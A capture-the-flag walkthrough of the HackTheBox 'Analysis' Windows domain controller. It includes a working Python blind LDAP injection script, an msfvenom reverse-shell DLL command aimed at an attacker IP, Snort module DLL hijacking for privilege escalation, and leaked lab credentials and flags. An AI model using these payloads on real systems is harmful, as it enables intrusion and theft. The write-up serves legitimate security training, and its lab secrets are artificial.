Nmap Results
SYN
scan didn't work, and required me to run a full TCP connect scan.# Nmap 7.94SVN scan initiated Fri Jan 26 12:09:18 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.250
Nmap scan report for 10.10.11.250
Host is up (0.012s latency).
Not shown: 65507 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-26 17:09:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=1/26%Time=65B3E74E%P=x86_64-pc-linux-gnu%
SF:r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RT
SF:SPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x0
SF:1\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Help,9,"\x0
SF:5\0\0\0\x0b\x08\x05\x1a\0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(TerminalServerCookie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSess
SF:ionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\
SF:x1a\x0fInvalid\x20message\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(LPDString,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSear
SF:chReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x
SF:1a\x0fInvalid\x20message\"\x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\x009\0\0\0\x01\x08\x01\x10\x88'\x1a\*Parse\x20error\x20unse
SF:rializing\x20protobuf\x20message\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0
SF:\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(oracle-tns,32,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x16Invalid\x20message-frame\.\"\x05HY000")%r(ms-sql-s,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")
SF:%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/26%OT=53%CT=1%CU=34827%PV=Y%DS=2%DC=T%G=Y%TM=65B3
OS:E799%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=FF%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M53CNW8NNS%
OS:O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)WIN(W1=F
OS:FFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M
OS:53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=8
OS:0%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-26T17:10:41
|_ start_date: N/A
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 11.19 ms 10.10.14.1
2 11.24 ms 10.10.11.250
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 26 12:10:49 2024 -- 1 IP address (1 host up) scanned in 90.41 seconds
nmap
output. You'll notice on tcp/389
(LDAP) that there's a root domain name of analysis.htb
. Add that to your hosts file.echo '10.10.11.250 analysis.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/389
nmap
output. You'll notice on tcp/389
(LDAP) that there's a LDAP default site name of analysis.htb0
.We can see the domain context is DC=analysis,DC=htb
, indicating a root domain of analysis.htb
and the LDAP server is named dc-analysis
. Let's add the domain to our hosts file.
echo '10.10.11.250 analysis.htb' | sudo tee -a /etc/hosts
TCP/53
TCP/139,445
TCP/88
TCP/80
Gobuster Enumeration
Directories and Files
gobuster dir -u http://analysis.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php -o gobuster-80.txt -t 100
/Images (Status: 301) [Size: 162] [--> http://analysis.htb/Images/]
/Index.html (Status: 200) [Size: 17830]
/bat (Status: 301) [Size: 159] [--> http://analysis.htb/bat/]
/css (Status: 301) [Size: 159] [--> http://analysis.htb/css/]
/images (Status: 301) [Size: 162] [--> http://analysis.htb/images/]
/index.html (Status: 200) [Size: 17830]
/js (Status: 301) [Size: 158] [--> http://analysis.htb/js/]
Nothing too promising here at first glance. This server is clearly using virtual hosts, as the behavior in page loads is different when loading http://10.10.11.250
and http://analysis.htb
. Time to enumerate virtual hosts.
Virtual Hosts
gobuster vhost -k --domain analysis.htb --append-domain -u http://10.10.11.250 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
Found: internal.analysis.htb Status: 403 [Size: 1268]
Enumerating the Virtual Host
gobuster dir -u http://internal.analysis.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php -o gobuster-80-internal.txt -t 100
/dashboard (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]
Enumerate /dashboard
gobuster dir -u http://internal.analysis.htb/dashboard -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,asp,aspx -o gobuster-80-internal.txt -t 100
/404.html (Status: 200) [Size: 13143]
/css (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/css/]
/img (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/img/]
/js (Status: 301) [Size: 177] [--> http://internal.analysis.htb/dashboard/js/]
/lib (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/lib/]
/uploads (Status: 301) [Size: 182] [--> http://internal.analysis.htb/dashboard/uploads/]
Clicking around on this page, and it's pretty clear that this is just a static HTML page and doesn't have any real interactive or session management features. None of the other directories discovered appeared to contain anything interesting that I could find.
Enumerate /users and /employees
gobuster dir -u http://internal.analysis.htb/employees -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php -o gobuster-80-internal.txt -t 100
gobuster dir -u http://internal.analysis.htb/users -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-internal.txt -t 100
/list.php (Status: 200) [Size: 17]
gobuster
fuzz utility, I notice a lot of web server responses with a content length of 17
. We'll have much better luck finding a parameter if we filter this out. To do so, we can use the --exclude-length
flag.gobuster fuzz -u "http://internal.analysis.htb/users/list.php?FUZZ" -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -o 'gobuster-params.txt' --exclude-length 17
Found: [Status=200] [Length=406] [Word=name] http://internal.analysis.htb/users/list.php?name
The valid parameter is ?name
, indicating we should use a full URL of http://internal.analysis.htb/users/list.php?name=VALUE_HERE
. Let's see what we can dig up. Here is a list of the usernames from the kerbrute
output. Let's see if we can use these to our advantage.
for user in $(cat usernames.txt) ; do curl -s -x http://127.0.0.1:8080 "http://internal.analysis.htb/users/list.php?name=$user" ; done
We'll run a loop over the usernames and request them in the ?name=
parameter. We'll also proxy the requests through Burp, so we can view the results.
*
character returns the technician
user. Also, using **
as input seems to break the application entirely. The *
character is very common in LDAP lookups, so it's entirely possible this PHP script is searching for names using LDAP.Testing Blind LDAP Injection
Since, we know the parameter is injectable and likely using LDAP, we can search various attributes of the user object in LDAP. One place to look is the user Description
field in LDAP, as sometimes, administrators put sensitive information such as passwords here.
Python LDAP Injection Script
#! /usr/bin/env python3
import urllib.parse
import requests
import string
# Define the characters to test for the ldap_contents
alphanumeric_chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&()-_=+.;:'"'"'",<.>/?\\|[{]}'
# Define the proxy server to use
proxies = {'http': 'http://127.0.0.1:8080'}
# User Agent
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9'
}
# Empty string to concatenate discovered characters
ldap_contents = ''
# Boolean to indicate if an asterisk should be appended to search or not
try_with_asterisk = False
# Define the base URL and LDAP variables
ldap_object_type = 'user'
ldap_field = 'description'
base_url = f'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass={ldap_object_type})({ldap_field}='
# Loop through each character in the alphanumeric_chars variable
for i in range(1, 100):
found_char = False
for char in alphanumeric_chars:
if try_with_asterisk:
# Encode any special characters in the ldap_contents
encoded_char = urllib.parse.quote((ldap_contents + '*' + char), safe="")
else:
encoded_char = urllib.parse.quote((ldap_contents + char), safe="")
url = f'{base_url}{encoded_char}*)'
response = requests.get(url, proxies=proxies, headers=headers)
# Check if the character was found in the response
# Match on 'technician' since that was the user returned when testing injections
if 'technician' in response.text:
if try_with_asterisk:
ldap_contents += ('*' + char)
try_with_asterisk = False
else:
ldap_contents += char
found_char = True
break
if not found_char:
# We've looped through all of the character options
# Now, try all of the character options again, except
# Place an asterisk between the current ldap_contents string and the new loop
# Do it this way to avoid a '**' double asterisk injection, which breaks the LDAP lookup
if not try_with_asterisk:
try_with_asterisk = True
else:
# All attempts exhausted, return whatever we've got
break
if not try_with_asterisk:
# Print the current ldap_contents on iterations where not retrying with asterisk
# No need to duplicate output
print(f'LDAP contents of {ldap_field} field so far: {ldap_contents}')
# Print the final ldap_contents
if ldap_contents:
print(f'Final output of LDAP of {ldap_field} field: {ldap_contents}')
else:
print(f'Nothing found in LDAP field: {ldap_field}')
Pay careful attention to the base_url
variable in the script. You'll note the syntax of:
base_url = f'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass={ldap_object_type})({ldap_field}='
Which effectively produces an LDAP query of:
*)(&
(objectClass=user)
(description={encoded_char}*)
So, we're saying, get any user *)
which closes this filter, but we open and AND
filter (&
and require that it be an object type of user
and the description should match {encoded_char}
.
And, {encoded_char}
is a string of characters — URL encoded — that continuously grows as valid matches are found in the description
field.
Test Credentials on Employee Login
Exploit
A PHP script that is vulnerable to LDAP injection in a development environment is world-accessible and easily discoverable using basic virtual host and file enumeration steps. Using blind LDAP injection, an attacker is able to loop over an alphanumeric set of characters to gather specific information about user objects.
In this particular case, a password was stored in one of the user objects that was enumerated in an earlier step by gathering valid usernames from Kerberos. Once logged into the employee dashboard, a file upload form allows for any file with any extension to be uploaded, and informs the user where the files are uploaded to.
Admin Panel File Upload
Post-Exploit Enumeration
Operating Environment
OS & Kernel
WindowsBuildLabEx : 17763.1.x86fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 01/01/1970 00:00:00
WindowsProductId :
WindowsProductName : Windows Server 2019 Standard
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Utilisateur Windows
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809
BiosCharacteristics :
BiosBIOSVersion :
BiosBuildNumber :
BiosCaption :
BiosCodeSet :
BiosCurrentLanguage :
BiosDescription :
BiosEmbeddedControllerMajorVersion :
BiosEmbeddedControllerMinorVersion :
BiosFirmwareType :
BiosIdentificationCode :
BiosInstallableLanguages :
BiosInstallDate :
BiosLanguageEdition :
BiosListOfLanguages :
BiosManufacturer :
BiosName :
BiosOtherTargetOS :
BiosPrimaryBIOS :
BiosReleaseDate :
BiosSeralNumber :
BiosSMBIOSBIOSVersion :
BiosSMBIOSMajorVersion :
BiosSMBIOSMinorVersion :
BiosSMBIOSPresent :
BiosSoftwareElementState :
BiosStatus :
BiosSystemBiosMajorVersion :
BiosSystemBiosMinorVersion :
BiosTargetOperatingSystem :
BiosVersion :
CsAdminPasswordStatus :
CsAutomaticManagedPagefile :
CsAutomaticResetBootOption :
CsAutomaticResetCapability :
CsBootOptionOnLimit :
CsBootOptionOnWatchDog :
CsBootROMSupported :
CsBootStatus :
CsBootupState :
CsCaption :
CsChassisBootupState :
CsChassisSKUNumber :
CsCurrentTimeZone :
CsDaylightInEffect :
CsDescription :
CsDNSHostName :
CsDomain :
CsDomainRole :
CsEnableDaylightSavingsTime :
CsFrontPanelResetStatus :
CsHypervisorPresent :
CsInfraredSupported :
CsInitialLoadInfo :
CsInstallDate :
CsKeyboardPasswordStatus :
CsLastLoadInfo :
CsManufacturer :
CsModel :
CsName :
CsNetworkAdapters :
CsNetworkServerModeEnabled :
CsNumberOfLogicalProcessors :
CsNumberOfProcessors :
CsProcessors :
CsOEMStringArray :
CsPartOfDomain :
CsPauseAfterReset :
CsPCSystemType :
CsPCSystemTypeEx :
CsPowerManagementCapabilities :
CsPowerManagementSupported :
CsPowerOnPasswordStatus :
CsPowerState :
CsPowerSupplyState :
CsPrimaryOwnerContact :
CsPrimaryOwnerName :
CsResetCapability :
CsResetCount :
CsResetLimit :
CsRoles :
CsStatus :
CsSupportContactDescription :
CsSystemFamily :
CsSystemSKUNumber :
CsSystemType :
CsThermalState :
CsTotalPhysicalMemory :
CsPhyicallyInstalledMemory :
CsUserName :
CsWakeUpType :
CsWorkgroup :
OsName :
OsType :
OsOperatingSystemSKU :
OsVersion :
OsCSDVersion :
OsBuildNumber :
OsHotFixes :
OsBootDevice :
OsSystemDevice :
OsSystemDirectory :
OsSystemDrive :
OsWindowsDirectory :
OsCountryCode :
OsCurrentTimeZone :
OsLocaleID :
OsLocale :
OsLocalDateTime :
OsLastBootUpTime :
OsUptime :
OsBuildType :
OsCodeSet :
OsDataExecutionPreventionAvailable :
OsDataExecutionPrevention32BitApplications :
OsDataExecutionPreventionDrivers :
OsDataExecutionPreventionSupportPolicy :
OsDebug :
OsDistributed :
OsEncryptionLevel :
OsForegroundApplicationBoost :
OsTotalVisibleMemorySize :
OsFreePhysicalMemory :
OsTotalVirtualMemorySize :
OsFreeVirtualMemory :
OsInUseVirtualMemory :
OsTotalSwapSpaceSize :
OsSizeStoredInPagingFiles :
OsFreeSpaceInPagingFiles :
OsPagingFiles :
OsHardwareAbstractionLayer :
OsInstallDate :
OsManufacturer :
OsMaxNumberOfProcesses :
OsMaxProcessMemorySize :
OsMuiLanguages :
OsNumberOfLicensedUsers :
OsNumberOfProcesses :
OsNumberOfUsers :
OsOrganization :
OsArchitecture :
OsLanguage :
OsProductSuites :
OsOtherTypeDescription :
OsPAEEnabled :
OsPortableOperatingSystem :
OsPrimary :
OsProductType :
OsRegisteredUser :
OsSerialNumber :
OsServicePackMajorVersion :
OsServicePackMinorVersion :
OsStatus :
OsSuites :
OsServerLevel :
KeyboardLayout :
TimeZone : (UTC+01:00) Bruxelles, Copenhague, Madrid, Paris
LogonServer :
PowerPlatformRole : Desktop
HyperVisorPresent :
HyperVRequirementDataExecutionPreventionAvailable :
HyperVRequirementSecondLevelAddressTranslation :
HyperVRequirementVirtualizationFirmwareEnabled :
HyperVRequirementVMMonitorModeExtensions :
DeviceGuardSmartStatus : Off
DeviceGuardRequiredSecurityProperties :
DeviceGuardAvailableSecurityProperties :
DeviceGuardSecurityServicesConfigured :
DeviceGuardSecurityServicesRunning :
DeviceGuardCodeIntegrityPolicyEnforcementStatus :
DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus :
Current User
Informations sur l'utilisateur
------------------------
Nom d'utilisateur SID
================= =============================================
analysis\svc_web S-1-5-21-916175351-3772503854-3498620144-2101
Informations de groupe
----------------------
Nom du groupe Type SID Attributs
=================================================== ================= ============================================================= ====================================================
Tout le monde Groupe bien connu S-1-1-0 Groupe obligatoire, Activ� par d�faut, Groupe activ�
BUILTIN\Utilisateurs Alias S-1-5-32-545 Groupe obligatoire, Activ� par d�faut, Groupe activ�
BUILTIN\Acc�s compatible pr�-Windows 2000 Alias S-1-5-32-554 Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\TACHE Groupe bien connu S-1-5-3 Groupe obligatoire, Activ� par d�faut, Groupe activ�
OUVERTURE DE SESSION DE CONSOLE Groupe bien connu S-1-2-1 Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\Utilisateurs authentifi�s Groupe bien connu S-1-5-11 Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\Cette organisation Groupe bien connu S-1-5-15 Groupe obligatoire, Activ� par d�faut, Groupe activ�
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Groupe obligatoire, Activ� par d�faut, Groupe activ�
LOCAL Groupe bien connu S-1-2-0 Groupe obligatoire, Activ� par d�faut, Groupe activ�
IIS APPPOOL\internal Groupe bien connu S-1-5-82-780022665-423385827-2835031938-1607344665-2144950284 Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\Authentifications NTLM Groupe bien connu S-1-5-64-10 Groupe obligatoire, Activ� par d�faut, Groupe activ�
�tiquette obligatoire\Niveau obligatoire moyen plus Nom S-1-16-8448
Informations de privil�ges
----------------------
Nom de privil�ge Description �tat
============================= =============================================== =========
SeIncreaseQuotaPrivilege Ajuster les quotas de m�moire pour un processus D�sactiv�
SeMachineAccountPrivilege Ajouter des stations de travail au domaine D�sactiv�
SeAuditPrivilege G�n�rer des audits de s�curit� D�sactiv�
SeChangeNotifyPrivilege Contourner la v�rification de parcours Activ�
SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus D�sactiv�
Users and Groups
LDAP Domain Dump
Network Configurations
Network Interfaces
Configuration IP de Windows
Carte Ethernet Ethernet0 2 :
Suffixe DNS propre � la connexion. . . :
Adresse IPv4. . . . . . . . . . . . . .: 10.10.11.250
Masque de sous-r�seau. . . .�. . . . . : 255.255.254.0
Passerelle par d�faut. . . .�. . . . . : 10.10.10.2
Processes and Services
Interesting Processes
Name : w3wp.exe
CommandLine : c:\windows\system32\inetsrv\w3wp.exe -ap "internal" -v "v4.0" -l "webengine4.dll" -a
\\.\pipe\iisipm8fb8e015-7252-49c2-b715-3deade9f0852 -h
"C:\inetpub\temp\apppools\internal\internal.config" -w "" -m 0 -t 20 -ta 0
Name : snort.exe
CommandLine :
Name : BCTextEncoder.exe.exe
CommandLine :
Name : TextEncode.exe
CommandLine :
Name : TextEncode.exe
CommandLine :
Interesting Services
Name : SnortSvc
StartName : ANALYSIS\Administrateur
PathName : C:\Snort\bin\snort.exe /SERVICE
Interesting Files
C:\inetpub\internal\users\list.php
<?php
//LDAP Bind paramters, need to be a normal AD User account.
error_reporting(0);
$ldap_password = 'N1G6G46G@G!j';
$ldap_username = 'webservice@analysis.htb';
$ldap_connection = ldap_connect("analysis.htb");
if(isset($_GET['name'])){
if (FALSE === $ldap_connection) {
// Uh-oh, something is wrong...
echo 'Unable to connect to the ldap server';
}
// We have to set this option for the version of Active Directory we are using.
ldap_set_option($ldap_connection, LDAP_OPT_PROTOCOL_VERSION, 3) or die('Unable to set LDAP protocol version');
ldap_set_option($ldap_connection, LDAP_OPT_REFERRALS, 0); // We need this for doing an LDAP search.
if (TRUE === ldap_bind($ldap_connection, $ldap_username, $ldap_password)) {
//Your domains DN to query
$ldap_base_dn = 'OU=sysadmins,DC=analysis,DC=htb';
//Get standard users and contacts
$search_filter = '(&(objectCategory=person)(objectClass=user)(sAMAccountName='.$_GET['name'].'))';
C:\inetpub\internal\employees\login.php
<?php
$host = "localhost";
$username = "db_master";
$password = '0$TBO7H8s12yh&';
$database = "employees";
$message= "";
try
{
$connect = new PDO("mysql:host=$host; dbname=$database", $username, $password);
$connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
...
...
...
C:\private\encoded.txt
-----BEGIN ENCODED MESSAGE-----
Version: BCTextEncoder Utility v. 1.03.2.1
wy4ECQMCq0jPQTxt+3BgTzQTBPQFbt5KnV7LgBq6vcKWtbdKAf59hbw0KGN9lBIK
0kcBSYXfHU2s7xsWA3pCtjthI0lge3SyLOMw9T81CPqT3HOIKkh3SVcO9jdrxfwu
pHnjX+5HyybuBwIQwGprgyWdGnyv3mfcQQ==
=a7bc
-----END ENCODED MESSAGE-----
Privilege Escalation
There were a few interesting breadcrumbs to follow in the post-exploit enumeration, namely:
BCTextEncoder
- In my enumeration, this was just used to spawn login sessions for
jdoe
- In my enumeration, this was just used to spawn login sessions for
- The
webservice
credential- In my enumeration, this is a dead end
- The
jdoe
WinRM user- I did find a credential for
jdoe
, but we actually don't need to pivot to this user
- I did find a credential for
- The
SnortSvc
service
Snort
Enumerating the Service
Since we know the SnortSvc
service is running with administrative privileges, it makes sense to look there first. At first glance, the service path may look like an unquoted service path, but this is not the case.
Much in the same way you'd look at writable systemd
unit file directories on a Linux host, you should look for writable service directories on a Windows host. I came up with this PowerShell one-liner to enumerate the C:\Snort
directory:
Get-ChildItem -Recurse C:\Snort | ForEach-Object { Write-Host $_.FullName ; Write-Host '' ; Get-Acl $_.FullName | Select-Object -ExpandProperty Access | Where-Object {$_.IdentityReference -eq 'BUILTIN\Utilisateurs' -and $_.FileSystemRights -notlike '*Read*'} | Format-List FileSystemRights, IdentityReference, AccessControlType}
This one-line is doing the following:
- Recurse into
C:\Snort
and get all files and directories - Pipe to
Get-Acl
and look at theAccess
property of the ACL objects - Filter on Access rights where applies to the
BUILTIN\Users
(in French on the target) and filter out any rights withRead
, since that's not interesting in this case - Finally, output in list format any access rights on files and/or folders
You'll notice right away that we have AppendData
and CreateFiles
permissions as low-level users on a a lot of interesting directories.
If you look at the C:\Snort\etc\snort.conf
file, you'll see a particular directory that's ripe for abuse.
If — as instructed in the configuration file — you reference the Snort manual, you'll see that Snort allows developers and admins to place custom modules to extend the capabilities of Snort.
You'll notice that the naming convention appears to be sf_
+ proto.dll
. Following this convention, we should be able to obtain a reverse shell.
Reverse Shell as Administrator
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f dll -o sf_pwn.dll
powershell.exe
. Then, run ls -recurse -filter 'user.txt' C:\Users
.Flags
User
f3f353dafd064476b25e8a2e0ef45b32
Root
db1297ecd96a5d66f15ba2946c6aa497